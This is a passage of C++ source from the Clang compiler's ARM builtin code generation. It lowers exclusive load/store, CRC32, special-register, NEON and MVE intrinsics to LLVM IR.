Value *Val = Builder.CreateCall(F, Builder.CreateBitCast(LdPtr, Int8PtrTy),
"ldrexd");
Value *Val0 = Builder.CreateExtractValue(Val, 1);
Value *Val1 = Builder.CreateExtractValue(Val, 0);
Val0 = Builder.CreateZExt(Val0, Int64Ty);
Val1 = Builder.CreateZExt(Val1, Int64Ty);
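// Reassemble the 64-bit result as (Val0 << 32) | Val1, treating element 1
// of the intrinsic's return value as the high word and element 0 as the low.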
Value *ShiftCst = llvm::ConstantInt::get(Int64Ty, 32);
Val = Builder.CreateShl(Val0, ShiftCst, "shl", true /* nuw */);
Val = Builder.CreateOr(Val, Val1);
return Builder.CreateBitCast(Val, ConvertType(E->getType()));
}
if (BuiltinID == ARM::BI__builtin_arm_ldrex ||
BuiltinID == ARM::BI__builtin_arm_ldaex) {
Value *LoadAddr = EmitScalarExpr(E->getArg(0));
QualType Ty = E->getType();
llvm::Type *RealResTy = ConvertType(Ty);
llvm::Type *PtrTy = llvm::IntegerType::get(
getLLVMContext(), getContext().getTypeSize(Ty))->getPointerTo();
LoadAddr = Builder.CreateBitCast(LoadAddr, PtrTy);
Function *F = CGM.getIntrinsic(BuiltinID == ARM::BI__builtin_arm_ldaex
? Intrinsic::arm_ldaex
: Intrinsic::arm_ldrex,
PtrTy);
Value *Val = Builder.CreateCall(F, LoadAddr, "ldrex");
if (RealResTy->isPointerTy())
return Builder.CreateIntToPtr(Val, RealResTy);
else {
llvm::Type *IntResTy = llvm::IntegerType::get(
getLLVMContext(), CGM.getDataLayout().getTypeSizeInBits(RealResTy));
Val = Builder.CreateTruncOrBitCast(Val, IntResTy);
return Builder.CreateBitCast(Val, RealResTy);
}
}
if (BuiltinID == ARM::BI__builtin_arm_strexd ||
((BuiltinID == ARM::BI__builtin_arm_stlex ||
BuiltinID == ARM::BI__builtin_arm_strex) &&
getContext().getTypeSize(E->getArg(0)->getType()) == 64)) {
Function *F = CGM.getIntrinsic(BuiltinID == ARM::BI__builtin_arm_stlex
? Intrinsic::arm_stlexd
: Intrinsic::arm_strexd);
llvm::Type *STy = llvm::StructType::get(Int32Ty, Int32Ty);
Address Tmp = CreateMemTemp(E->getArg(0)->getType());
Value *Val = EmitScalarExpr(E->getArg(0));
Builder.CreateStore(Val, Tmp);
Address LdPtr = Builder.CreateBitCast(Tmp, llvm::PointerType::getUnqual(STy));
Val = Builder.CreateLoad(LdPtr);
Value *Arg0 = Builder.CreateExtractValue(Val, 0);
Value *Arg1 = Builder.CreateExtractValue(Val, 1);
Value *StPtr = Builder.CreateBitCast(EmitScalarExpr(E->getArg(1)), Int8PtrTy);
return Builder.CreateCall(F, {Arg0, Arg1, StPtr}, "strexd");
}
if (BuiltinID == ARM::BI__builtin_arm_strex ||
BuiltinID == ARM::BI__builtin_arm_stlex) {
Value *StoreVal = EmitScalarExpr(E->getArg(0));
Value *StoreAddr = EmitScalarExpr(E->getArg(1));
QualType Ty = E->getArg(0)->getType();
llvm::Type *StoreTy = llvm::IntegerType::get(getLLVMContext(),
getContext().getTypeSize(Ty));
StoreAddr = Builder.CreateBitCast(StoreAddr, StoreTy->getPointerTo());
if (StoreVal->getType()->isPointerTy())
StoreVal = Builder.CreatePtrToInt(StoreVal, Int32Ty);
else {
llvm::Type *IntTy = llvm::IntegerType::get(
getLLVMContext(),
CGM.getDataLayout().getTypeSizeInBits(StoreVal->getType()));
StoreVal = Builder.CreateBitCast(StoreVal, IntTy);
StoreVal = Builder.CreateZExtOrBitCast(StoreVal, Int32Ty);
}
Function *F = CGM.getIntrinsic(BuiltinID == ARM::BI__builtin_arm_stlex
? Intrinsic::arm_stlex
: Intrinsic::arm_strex,
StoreAddr->getType());
return Builder.CreateCall(F, {StoreVal, StoreAddr}, "strex");
}
if (BuiltinID == ARM::BI__builtin_arm_clrex) {
Function *F = CGM.getIntrinsic(Intrinsic::arm_clrex);
return Builder.CreateCall(F);
}
// CRC32
Intrinsic::ID CRCIntrinsicID = Intrinsic::not_intrinsic;
switch (BuiltinID) {
case ARM::BI__builtin_arm_crc32b:
CRCIntrinsicID = Intrinsic::arm_crc32b; break;
case ARM::BI__builtin_arm_crc32cb:
CRCIntrinsicID = Intrinsic::arm_crc32cb; break;
case ARM::BI__builtin_arm_crc32h:
CRCIntrinsicID = Intrinsic::arm_crc32h; break;
case ARM::BI__builtin_arm_crc32ch:
CRCIntrinsicID = Intrinsic::arm_crc32ch; break;
case ARM::BI__builtin_arm_crc32w:
case ARM::BI__builtin_arm_crc32d:
CRCIntrinsicID = Intrinsic::arm_crc32w; break;
case ARM::BI__builtin_arm_crc32cw:
case ARM::BI__builtin_arm_crc32cd:
CRCIntrinsicID = Intrinsic::arm_crc32cw; break;
}
if (CRCIntrinsicID != Intrinsic::not_intrinsic) {
Value *Arg0 = EmitScalarExpr(E->getArg(0));
Value *Arg1 = EmitScalarExpr(E->getArg(1));
// The crc32{c,}d intrinsics are implemented as two calls to the
// corresponding crc32{c,}w intrinsics, so they need different codegen.
if (BuiltinID == ARM::BI__builtin_arm_crc32d ||
BuiltinID == ARM::BI__builtin_arm_crc32cd) {
Value *C1 = llvm::ConstantInt::get(Int64Ty, 32);
Value *Arg1a = Builder.CreateTruncOrBitCast(Arg1, Int32Ty);
Value *Arg1b = Builder.CreateLShr(Arg1, C1);
Arg1b = Builder.CreateTruncOrBitCast(Arg1b, Int32Ty);
Function *F = CGM.getIntrinsic(CRCIntrinsicID);
Value *Res = Builder.CreateCall(F, {Arg0, Arg1a});
return Builder.CreateCall(F, {Res, Arg1b});
} else {
Arg1 = Builder.CreateZExtOrBitCast(Arg1, Int32Ty);
Function *F = CGM.getIntrinsic(CRCIntrinsicID);
return Builder.CreateCall(F, {Arg0, Arg1});
}
}
if (BuiltinID == ARM::BI__builtin_arm_rsr ||
BuiltinID == ARM::BI__builtin_arm_rsr64 ||
BuiltinID == ARM::BI__builtin_arm_rsrp ||
BuiltinID == ARM::BI__builtin_arm_wsr ||
BuiltinID == ARM::BI__builtin_arm_wsr64 ||
BuiltinID == ARM::BI__builtin_arm_wsrp) {
SpecialRegisterAccessKind AccessKind = Write;
if (BuiltinID == ARM::BI__builtin_arm_rsr ||
BuiltinID == ARM::BI__builtin_arm_rsr64 ||
BuiltinID == ARM::BI__builtin_arm_rsrp)
AccessKind = VolatileRead;
bool IsPointerBuiltin = BuiltinID == ARM::BI__builtin_arm_rsrp ||
BuiltinID == ARM::BI__builtin_arm_wsrp;
bool Is64Bit = BuiltinID == ARM::BI__builtin_arm_rsr64 ||
BuiltinID == ARM::BI__builtin_arm_wsr64;
llvm::Type *ValueType;
llvm::Type *RegisterType;
if (IsPointerBuiltin) {
ValueType = VoidPtrTy;
RegisterType = Int32Ty;
} else if (Is64Bit) {
ValueType = RegisterType = Int64Ty;
} else {
ValueType = RegisterType = Int32Ty;
}
return EmitSpecialRegisterBuiltin(*this, E, RegisterType, ValueType,
AccessKind);
}
// Handle MSVC intrinsics before argument evaluation to prevent double
// evaluation.
if (Optional<MSVCIntrin> MsvcIntId = translateArmToMsvcIntrin(BuiltinID))
return EmitMSVCBuiltinExpr(*MsvcIntId, E);
// Deal with MVE builtins
if (Value *Result = EmitARMMVEBuiltinExpr(BuiltinID, E, ReturnValue, Arch))
return Result;
// Handle CDE builtins
if (Value *Result = EmitARMCDEBuiltinExpr(BuiltinID, E, ReturnValue, Arch))
return Result;
// Find out if any arguments are required to be integer constant
// expressions.
unsigned ICEArguments = 0;
ASTContext::GetBuiltinTypeError Error;
getContext().GetBuiltinType(BuiltinID, Error, &ICEArguments);
assert(Error == ASTContext::GE_None && "Should not codegen an error");
auto getAlignmentValue32 = [&](Address addr) -> Value* {
return Builder.getInt32(addr.getAlignment().getQuantity());
};
Address PtrOp0 = Address::invalid();
Address PtrOp1 = Address::invalid();
SmallVector<Value*, 4> Ops;
bool HasExtraArg = HasExtraNeonArgument(BuiltinID);
unsigned NumArgs = E->getNumArgs() - (HasExtraArg ? 1 : 0);
for (unsigned i = 0, e = NumArgs; i != e; i++) {
if (i == 0) {
switch (BuiltinID) {
case NEON::BI__builtin_neon_vld1_v:
case NEON::BI__builtin_neon_vld1q_v:
case NEON::BI__builtin_neon_vld1q_lane_v:
case NEON::BI__builtin_neon_vld1_lane_v:
case NEON::BI__builtin_neon_vld1_dup_v:
case NEON::BI__builtin_neon_vld1q_dup_v:
case NEON::BI__builtin_neon_vst1_v:
case NEON::BI__builtin_neon_vst1q_v:
case NEON::BI__builtin_neon_vst1q_lane_v:
case NEON::BI__builtin_neon_vst1_lane_v:
case NEON::BI__builtin_neon_vst2_v:
case NEON::BI__builtin_neon_vst2q_v:
case NEON::BI__builtin_neon_vst2_lane_v:
case NEON::BI__builtin_neon_vst2q_lane_v:
case NEON::BI__builtin_neon_vst3_v:
case NEON::BI__builtin_neon_vst3q_v:
case NEON::BI__builtin_neon_vst3_lane_v:
case NEON::BI__builtin_neon_vst3q_lane_v:
case NEON::BI__builtin_neon_vst4_v:
case NEON::BI__builtin_neon_vst4q_v:
case NEON::BI__builtin_neon_vst4_lane_v:
case NEON::BI__builtin_neon_vst4q_lane_v:
// Get the alignment for the argument in addition to the value;
// we'll use it later.
PtrOp0 = EmitPointerWithAlignment(E->getArg(0));
Ops.push_back(PtrOp0.getPointer());
continue;
}
}
if (i == 1) {
switch (BuiltinID) {
case NEON::BI__builtin_neon_vld2_v:
case NEON::BI__builtin_neon_vld2q_v:
case NEON::BI__builtin_neon_vld3_v:
case NEON::BI__builtin_neon_vld3q_v:
case NEON::BI__builtin_neon_vld4_v:
case NEON::BI__builtin_neon_vld4q_v:
case NEON::BI__builtin_neon_vld2_lane_v:
case NEON::BI__builtin_neon_vld2q_lane_v:
case NEON::BI__builtin_neon_vld3_lane_v:
case NEON::BI__builtin_neon_vld3q_lane_v:
case NEON::BI__builtin_neon_vld4_lane_v:
case NEON::BI__builtin_neon_vld4q_lane_v:
case NEON::BI__builtin_neon_vld2_dup_v:
case NEON::BI__builtin_neon_vld2q_dup_v:
case NEON::BI__builtin_neon_vld3_dup_v:
case NEON::BI__builtin_neon_vld3q_dup_v:
case NEON::BI__builtin_neon_vld4_dup_v:
case NEON::BI__builtin_neon_vld4q_dup_v:
// Get the alignment for the argument in addition to the value;
// we'll use it later.
PtrOp1 = EmitPointerWithAlignment(E->getArg(1));
Ops.push_back(PtrOp1.getPointer());
continue;
}
}
if ((ICEArguments & (1 << i)) == 0) {
Ops.push_back(EmitScalarExpr(E->getArg(i)));
} else {
// If this is required to be a constant, constant fold it so that we know
// that the generated intrinsic gets a ConstantInt.
Ops.push_back(llvm::ConstantInt::get(
getLLVMContext(),
*E->getArg(i)->getIntegerConstantExpr(getContext())));
}
}
switch (BuiltinID) {
default: break;
case NEON::BI__builtin_neon_vget_lane_i8:
case NEON::BI__builtin_neon_vget_lane_i16:
case NEON::BI__builtin_neon_vget_lane_i32:
case NEON::BI__builtin_neon_vget_lane_i64:
case NEON::BI__builtin_neon_vget_lane_bf16:
case NEON::BI__builtin_neon_vget_lane_f32:
case NEON::BI__builtin_neon_vgetq_lane_i8:
case NEON::BI__builtin_neon_vgetq_lane_i16:
case NEON::BI__builtin_neon_vgetq_lane_i32:
case NEON::BI__builtin_neon_vgetq_lane_i64:
case NEON::BI__builtin_neon_vgetq_lane_bf16:
case NEON::BI__builtin_neon_vgetq_lane_f32:
case NEON::BI__builtin_neon_vduph_lane_bf16:
case NEON::BI__builtin_neon_vduph_laneq_bf16:
return Builder.CreateExtractElement(Ops[0], Ops[1], "vget_lane");
case NEON::BI__builtin_neon_vrndns_f32: {
Value *Arg = EmitScalarExpr(E->getArg(0));
llvm::Type *Tys[] = {Arg->getType()};
Function *F = CGM.getIntrinsic(Intrinsic::arm_neon_vrintn, Tys);
return Builder.CreateCall(F, {Arg}, "vrndn");
}
case NEON::BI__builtin_neon_vset_lane_i8:
case NEON::BI__builtin_neon_vset_lane_i16:
case NEON::BI__builtin_neon_vset_lane_i32:
case NEON::BI__builtin_neon_vset_lane_i64:
case NEON::BI__builtin_neon_vset_lane_bf16:
case NEON::BI__builtin_neon_vset_lane_f32:
case NEON::BI__builtin_neon_vsetq_lane_i8:
case NEON::BI__builtin_neon_vsetq_lane_i16:
case NEON::BI__builtin_neon_vsetq_lane_i32:
case NEON::BI__builtin_neon_vsetq_lane_i64:
case NEON::BI__builtin_neon_vsetq_lane_bf16:
case NEON::BI__builtin_neon_vsetq_lane_f32:
return Builder.CreateInsertElement(Ops[1], Ops[0], Ops[2], "vset_lane");
case NEON::BI__builtin_neon_vsha1h_u32:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_sha1h), Ops,
"vsha1h");
case NEON::BI__builtin_neon_vsha1cq_u32:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_sha1c), Ops,
"vsha1c");
case NEON::BI__builtin_neon_vsha1pq_u32:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_sha1p), Ops,
"vsha1p");
case NEON::BI__builtin_neon_vsha1mq_u32:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_sha1m), Ops,
"vsha1m");
case NEON::BI__builtin_neon_vcvth_bf16_f32: {
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vcvtbfp2bf), Ops,
"vcvtbfp2bf");
}
// The ARM _MoveToCoprocessor builtins put the input register value as
// the first argument, but the LLVM intrinsic expects it as the third one.
case ARM::BI_MoveToCoprocessor:
case ARM::BI_MoveToCoprocessor2: {
Function *F = CGM.getIntrinsic(BuiltinID == ARM::BI_MoveToCoprocessor ?
Intrinsic::arm_mcr : Intrinsic::arm_mcr2);
return Builder.CreateCall(F, {Ops[1], Ops[2], Ops[0],
Ops[3], Ops[4], Ops[5]});
}
}
// Get the last argument, which specifies the vector type.
assert(HasExtraArg);
const Expr *Arg = E->getArg(E->getNumArgs()-1);
Optional<llvm::APSInt> Result = Arg->getIntegerConstantExpr(getContext());
if (!Result)
return nullptr;
if (BuiltinID == ARM::BI__builtin_arm_vcvtr_f ||
BuiltinID == ARM::BI__builtin_arm_vcvtr_d) {
// Determine the overloaded type of this builtin.
llvm::Type *Ty;
if (BuiltinID == ARM::BI__builtin_arm_vcvtr_f)
Ty = FloatTy;
else
Ty = DoubleTy;
// Determine whether this is an unsigned conversion or not.
bool usgn = Result->getZExtValue() == 1;
unsigned Int = usgn ? Intrinsic::arm_vcvtru : Intrinsic::arm_vcvtr;
// Call the appropriate intrinsic.
Function *F = CGM.getIntrinsic(Int, Ty);
return Builder.CreateCall(F, Ops, "vcvtr");
}
// Determine the type of this overloaded NEON intrinsic.
NeonTypeFlags Type = Result->getZExtValue();
bool usgn = Type.isUnsigned();
bool rightShift = false;
llvm::FixedVectorType *VTy =
GetNeonType(this, Type, getTarget().hasLegalHalfType(), false,
getTarget().hasBFloat16Type());
llvm::Type *Ty = VTy;
if (!Ty)
return nullptr;
// Many NEON builtins have identical semantics and uses in ARM and
// AArch64. Emit these in a single function.
auto IntrinsicMap = makeArrayRef(ARMSIMDIntrinsicMap);
const ARMVectorIntrinsicInfo *Builtin = findARMVectorIntrinsicInMap(
IntrinsicMap, BuiltinID, NEONSIMDIntrinsicsProvenSorted);
if (Builtin)
return EmitCommonNeonBuiltinExpr(
Builtin->BuiltinID, Builtin->LLVMIntrinsic, Builtin->AltLLVMIntrinsic,
Builtin->NameHint, Builtin->TypeModifier, E, Ops, PtrOp0, PtrOp1, Arch);
unsigned Int;
switch (BuiltinID) {
default: return nullptr;
case NEON::BI__builtin_neon_vld1q_lane_v:
// Handle 64-bit integer elements as a special case. Use shuffles of
// one-element vectors to avoid poor code for i64 in the backend.
if (VTy->getElementType()->isIntegerTy(64)) {
// Extract the other lane.
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
int Lane = cast<ConstantInt>(Ops[2])->getZExtValue();
Value *SV = llvm::ConstantVector::get(ConstantInt::get(Int32Ty, 1-Lane));
Ops[1] = Builder.CreateShuffleVector(Ops[1], Ops[1], SV);
// Load the value as a one-element vector.
Ty = llvm::FixedVectorType::get(VTy->getElementType(), 1);
llvm::Type *Tys[] = {Ty, Int8PtrTy};
Function *F = CGM.getIntrinsic(Intrinsic::arm_neon_vld1, Tys);
Value *Align = getAlignmentValue32(PtrOp0);
Value *Ld = Builder.CreateCall(F, {Ops[0], Align});
// Combine them.
int Indices[] = {1 - Lane, Lane};
return Builder.CreateShuffleVector(Ops[1], Ld, Indices, "vld1q_lane");
}
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vld1_lane_v: {
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
PtrOp0 = Builder.CreateElementBitCast(PtrOp0, VTy->getElementType());
Value *Ld = Builder.CreateLoad(PtrOp0);
return Builder.CreateInsertElement(Ops[1], Ld, Ops[2], "vld1_lane");
}
case NEON::BI__builtin_neon_vqrshrn_n_v:
Int =
usgn ? Intrinsic::arm_neon_vqrshiftnu : Intrinsic::arm_neon_vqrshiftns;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vqrshrn_n",
1, true);
case NEON::BI__builtin_neon_vqrshrun_n_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vqrshiftnsu, Ty),
Ops, "vqrshrun_n", 1, true);
case NEON::BI__builtin_neon_vqshrn_n_v:
Int = usgn ? Intrinsic::arm_neon_vqshiftnu : Intrinsic::arm_neon_vqshiftns;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vqshrn_n",
1, true);
case NEON::BI__builtin_neon_vqshrun_n_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vqshiftnsu, Ty),
Ops, "vqshrun_n", 1, true);
case NEON::BI__builtin_neon_vrecpe_v:
case NEON::BI__builtin_neon_vrecpeq_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vrecpe, Ty),
Ops, "vrecpe");
case NEON::BI__builtin_neon_vrshrn_n_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vrshiftn, Ty),
Ops, "vrshrn_n", 1, true);
case NEON::BI__builtin_neon_vrsra_n_v:
case NEON::BI__builtin_neon_vrsraq_n_v:
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = EmitNeonShiftVector(Ops[2], Ty, true);
Int = usgn ? Intrinsic::arm_neon_vrshiftu : Intrinsic::arm_neon_vrshifts;
Ops[1] = Builder.CreateCall(CGM.getIntrinsic(Int, Ty), {Ops[1], Ops[2]});
return Builder.CreateAdd(Ops[0], Ops[1], "vrsra_n");
case NEON::BI__builtin_neon_vsri_n_v:
case NEON::BI__builtin_neon_vsriq_n_v:
rightShift = true;
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vsli_n_v:
case NEON::BI__builtin_neon_vsliq_n_v:
Ops[2] = EmitNeonShiftVector(Ops[2], Ty, rightShift);
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vshiftins, Ty),
Ops, "vsli_n");
case NEON::BI__builtin_neon_vsra_n_v:
case NEON::BI__builtin_neon_vsraq_n_v:
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[1] = EmitNeonRShiftImm(Ops[1], Ops[2], Ty, usgn, "vsra_n");
return Builder.CreateAdd(Ops[0], Ops[1]);
case NEON::BI__builtin_neon_vst1q_lane_v:
// Handle 64-bit integer elements as a special case. Use a shuffle to get
// a one-element vector and avoid poor code for i64 in the backend.
if (VTy->getElementType()->isIntegerTy(64)) {
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Value *SV = llvm::ConstantVector::get(cast<llvm::Constant>(Ops[2]));
Ops[1] = Builder.CreateShuffleVector(Ops[1], Ops[1], SV);
Ops[2] = getAlignmentValue32(PtrOp0);
llvm::Type *Tys[] = {Int8PtrTy, Ops[1]->getType()};
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::arm_neon_vst1,
Tys), Ops);
}
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vst1_lane_v: {
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[1] = Builder.CreateExtractElement(Ops[1], Ops[2]);
Ty = llvm::PointerType::getUnqual(Ops[1]->getType());
auto St = Builder.CreateStore(Ops[1], Builder.CreateBitCast(PtrOp0, Ty));
return St;
}
case NEON::BI__builtin_neon_vtbl1_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vtbl1),
Ops, "vtbl1");
case NEON::BI__builtin_neon_vtbl2_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vtbl2),
Ops, "vtbl2");
case NEON::BI__builtin_neon_vtbl3_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vtbl3),
Ops, "vtbl3");
case NEON::BI__builtin_neon_vtbl4_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vtbl4),
Ops, "vtbl4");
case NEON::BI__builtin_neon_vtbx1_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vtbx1),
Ops, "vtbx1");
case NEON::BI__builtin_neon_vtbx2_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vtbx2),
Ops, "vtbx2");
case NEON::BI__builtin_neon_vtbx3_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vtbx3),
Ops, "vtbx3");
case NEON::BI__builtin_neon_vtbx4_v:
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::arm_neon_vtbx4),
Ops, "vtbx4");
}
}
template<typename Integer>
static Integer GetIntegerConstantValue(const Expr *E, ASTContext &Context) {
return E->getIntegerConstantExpr(Context)->getExtValue();
}
static llvm::Value *SignOrZeroExtend(CGBuilderTy &Builder, llvm::Value *V,
llvm::Type *T, bool Unsigned) {
// Helper function called by Tablegen-constructed ARM MVE builtin codegen,
// which finds it convenient to specify signed/unsigned as a boolean flag.
return Unsigned ? Builder.CreateZExt(V, T) : Builder.CreateSExt(V, T);
}
static llvm::Value *MVEImmediateShr(CGBuilderTy &Builder, llvm::Value *V,
uint32_t Shift, bool Unsigned) {
// MVE helper function for integer shift right. This must handle signed vs
// unsigned, and also deal specially with the case where the shift count is
// equal to the lane size. In LLVM IR, an LShr with that parameter would be
// undefined behavior, but in MVE it's legal, so we must convert it to code
// that is not undefined in IR.
unsigned LaneBits = cast<llvm::VectorType>(V->getType())
->getElementType()
->getPrimitiveSizeInBits();
if (Shift == LaneBits) {
// An unsigned shift of the full lane size always generates zero, so we can
// simply emit a zero vector. A signed shift of the full lane size does the
// same thing as shifting by one bit fewer.
if (Unsigned)
return llvm::Constant::getNullValue(V->getType());
else
--Shift;
}
return Unsigned ? Builder.CreateLShr(V, Shift) : Builder.CreateAShr(V, Shift);
}
static llvm::Value *ARMMVEVectorSplat(CGBuilderTy &Builder, llvm::Value *V) {
// MVE-specific helper function for a vector splat, which infers the element
// count of the output vector by knowing that MVE vectors are all 128 bits
// wide.
unsigned Elements = 128 / V->getType()->getPrimitiveSizeInBits();
return Builder.CreateVectorSplat(Elements, V);
}
static llvm::Value *ARMMVEVectorReinterpret(CGBuilderTy &Builder,
CodeGenFunction *CGF,
llvm::Value *V,
llvm::Type *DestType) {
// Convert one MVE vector type into another by reinterpreting its in-register
// format.
//
// On little-endian targets this is identical to a bitcast (which
// reinterprets the memory format). On big-endian targets the two are not
// necessarily the same, because the register and memory formats map to each
// other differently depending on the lane size.
//
// We generate a bitcast whenever we can (if we're little-endian, or if the
// lane sizes are the same anyway). Otherwise we fall back to an IR intrinsic
// that performs the different kind of reinterpretation.
if (CGF->getTarget().isBigEndian() &&
V->getType()->getScalarSizeInBits() != DestType->getScalarSizeInBits()) {
return Builder.CreateCall(
CGF->CGM.getIntrinsic(Intrinsic::arm_mve_vreinterpretq,
{DestType, V->getType()}),
V);
} else {
return Builder.CreateBitCast(V, DestType);
}
}
static llvm::Value *VectorUnzip(CGBuilderTy &Builder, llvm::Value *V, bool Odd) {
// Make a shufflevector that extracts every other element of a vector (evens
// or odds, as desired).
SmallVector<int, 16> Indices;
unsigned InputElements =
cast<llvm::FixedVectorType>(V->getType())->getNumElements();
for (unsigned i = 0; i < InputElements; i += 2)
Indices.push_back(i + Odd);
return Builder.CreateShuffleVector(V, Indices);
}
static llvm::Value *VectorZip(CGBuilderTy &Builder, llvm::Value *V0,
llvm::Value *V1) {
// Make a shufflevector that interleaves two vectors element by element.
assert(V0->getType() == V1->getType() && "Can't zip different vector types");
SmallVector<int, 16> Indices;
unsigned InputElements =
cast<llvm::FixedVectorType>(V0->getType())->getNumElements();
for (unsigned i = 0; i < InputElements; i++) {
Indices.push_back(i);
Indices.push_back(i + InputElements);
}
return Builder.CreateShuffleVector(V0, V1, Indices);
}
template<unsigned HighBit, unsigned OtherBits>
static llvm::Value *ARMMVEConstantSplat(CGBuilderTy &Builder, llvm::Type *VT) {
// MVE-specific helper function to make a vector splat of a constant such as
// UINT_MAX or INT_MIN, in which all bits below the highest one are equal.
llvm::Type *T = cast<llvm::VectorType>(VT)->getElementType();
unsigned LaneBits = T->getPrimitiveSizeInBits();
uint32_t Value = HighBit << (LaneBits - 1);
if (OtherBits)
Value |= (1UL << (LaneBits - 1)) - 1;
llvm::Value *Lane = llvm::ConstantInt::get(T, Value);
return ARMMVEVectorSplat(Builder, Lane);
}
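// E.g. with 32-bit lanes, HighBit=1/OtherBits=0 splats 0x80000000 (INT_MIN)
// and HighBit=1/OtherBits=1 splats 0xFFFFFFFF (UINT_MAX).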
static llvm::Value *ARMMVEVectorElementReverse(CGBuilderTy &Builder,
llvm::Value *V,
unsigned ReverseWidth) {
// MVE-specific helper function which reverses the elements of a
// vector within every (ReverseWidth)-bit collection of lanes.
SmallVector<int, 16> Indices;
unsigned LaneSize = V->getType()->getScalarSizeInBits();
unsigned Elements = 128 / LaneSize;
unsigned Mask = ReverseWidth / LaneSize - 1;
for (unsigned i = 0; i < Elements; i++)
Indices.push_back(i ^ Mask);
return Builder.CreateShuffleVector(V, Indices);
}
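// E.g. reversing a v16i8 within 32-bit chunks (Mask = 3) uses the shuffle
// indices 3,2,1,0, 7,6,5,4, 11,10,9,8, 15,14,13,12.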
Value *CodeGenFunction::EmitARMMVEBuiltinExpr(unsigned BuiltinID,
const CallExpr *E,
ReturnValueSlot ReturnValue,
llvm::Triple::ArchType Arch) {
enum class CustomCodeGen { VLD24, VST24 } CustomCodeGenType;
Intrinsic::ID IRIntr;
unsigned NumVectors;
// Code autogenerated by Tablegen will handle all the simple builtins.
switch (BuiltinID) {
#include "clang/Basic/arm_mve_builtin_cg.inc"
// If we didn't match an MVE builtin id at all, go back to the
// main EmitARMBuiltinExpr.
default:
return nullptr;
}
// Anything that breaks from that switch is an MVE builtin that
// needs handwritten code to generate.
switch (CustomCodeGenType) {
case CustomCodeGen::VLD24: {
llvm::SmallVector<Value *, 4> Ops;
llvm::SmallVector<llvm::Type *, 4> Tys;
auto MvecCType = E->getType();
auto MvecLType = ConvertType(MvecCType);
assert(MvecLType->isStructTy() &&
"Return type for vld[24]q should be a struct");
assert(MvecLType->getStructNumElements() == 1 &&
"Return-type struct for vld[24]q should have one element");
auto MvecLTypeInner = MvecLType->getStructElementType(0);
assert(MvecLTypeInner->isArrayTy() &&
"Return-type struct for vld[24]q should contain an array");
assert(MvecLTypeInner->getArrayNumElements() == NumVectors &&
"Array member of return-type struct vld[24]q has wrong length");
auto VecLType = MvecLTypeInner->getArrayElementType();
Tys.push_back(VecLType);
auto Addr = E->getArg(0);
Ops.push_back(EmitScalarExpr(Addr));
Tys.push_back(ConvertType(Addr->getType()));
Function *F = CGM.getIntrinsic(IRIntr, makeArrayRef(Tys));
Value *LoadResult = Builder.CreateCall(F, Ops);
Value *MvecOut = UndefValue::get(MvecLType);
for (unsigned i = 0; i < NumVectors; ++i) {
Value *Vec = Builder.CreateExtractValue(LoadResult, i);
MvecOut = Builder.CreateInsertValue(MvecOut, Vec, {0, i});
}
if (ReturnValue.isNull())
return MvecOut;
else
return Builder.CreateStore(MvecOut, ReturnValue.getValue());
}
case CustomCodeGen::VST24: {
llvm::SmallVector<Value *, 4> Ops;
llvm::SmallVector<llvm::Type *, 4> Tys;
auto Addr = E->getArg(0);
Ops.push_back(EmitScalarExpr(Addr));
Tys.push_back(ConvertType(Addr->getType()));
auto MvecCType = E->getArg(1)->getType();
auto MvecLType = ConvertType(MvecCType);
assert(MvecLType->isStructTy() &&
"Data type for vst[24]q should be a struct");
assert(MvecLType->getStructNumElements() == 1 &&
"Data-type struct for vst[24]q should have one element");
auto MvecLTypeInner = MvecLType->getStructElementType(0);
assert(MvecLTypeInner->isArrayTy() &&
"Data-type struct for vst[24]q should contain an array");
assert(MvecLTypeInner->getArrayNumElements() == NumVectors &&
"Array member of data-type struct for vst[24]q has wrong length");
auto VecLType = MvecLTypeInner->getArrayElementType();
Tys.push_back(VecLType);
AggValueSlot MvecSlot = CreateAggTemp(MvecCType);
EmitAggExpr(E->getArg(1), MvecSlot);
auto Mvec = Builder.CreateLoad(MvecSlot.getAddress());
for (unsigned i = 0; i < NumVectors; i++)
Ops.push_back(Builder.CreateExtractValue(Mvec, {0, i}));
Function *F = CGM.getIntrinsic(IRIntr, makeArrayRef(Tys));
Value *ToReturn = nullptr;
for (unsigned i = 0; i < NumVectors; i++) {
Ops.push_back(llvm::ConstantInt::get(Int32Ty, i));
ToReturn = Builder.CreateCall(F, Ops);
Ops.pop_back();
}
return ToReturn;
}
}
llvm_unreachable("unknown custom codegen type.");
}
Value *CodeGenFunction::EmitARMCDEBuiltinExpr(unsigned BuiltinID,
const CallExpr *E,
